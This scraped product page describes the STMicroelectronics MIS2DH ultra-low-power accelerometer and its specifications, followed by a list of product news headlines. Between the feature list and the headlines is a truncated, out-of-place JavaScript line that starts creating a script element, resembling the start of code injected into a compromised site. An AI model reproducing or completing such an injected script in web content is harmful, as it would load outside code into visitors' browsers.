Ultra low-power high performance 3-axes accelerometer STMicroelectronics
The MIS2DH is an ultra-low-power high-performance three-axis linear accelerometer with digital I2C/SPI serial interface standard output.
The MIS2DH is a device that has been conceived for medical and healthcare applications whenever the sensor itself is not used as a life-sustaining component.
The MIS2DH is available in a small thin plastic land grid array package (LGA) and is guaranteed to operate over an extended temperature range from -40 °C to +85 °C.
- Dynamically user selectable FS: ±2g/±4g/±8g/±16g
- I2C/SPI digital output interface
- 3 Operative modes: low power (8bits) / normal mode(10bits) / high resolution(12 bits)
- Output data rate: from 1Hz up to 5kHz
- Ultra low power consumption: down to 2uA in low power mode Wide supply voltage, 1.71 to 3.6 V
- LGA -12L2x2x1 mm3
var d=document;var s=d.createElement(‘script’);
- 22 Jun New highly integrated NFC Initiator / HF Reader IC for painless implementation
- 14 Jun Surface-Mount Intelligent Low-Power Modules from STMicroelectronics Save Space in Energy-Efficient Motor Drives
- 7 Jun Li-Ion battery chargers with LDO, load switches and (optional) smart reset generator
- 31 May 60 V intelligent power switch ready today for tomorrow’s factory automation
- 17 May STMicroelectronics Delivers New STM32L4 MCUs with On-Chip Digital Filter, Supported by Extended Development Ecosystem
- 13 May Motion MEMS and environmental sensor expansion board for STM32 Nucleo
- 5 May Affordable STM32 Cloud-Connectable Kit from STMicroelectronics Puts More Features On-Board for Fast and Flexible IoT-Device Development
- 29 Apr Very high accuracy Op-Amps TSZ182
- 20 Apr Build a presence detector that won’t drain the battery
- 15 Apr STMicroelectronics Teams with DSP Concepts to Give STM32 Users Free Access to Advanced Audio Design Tool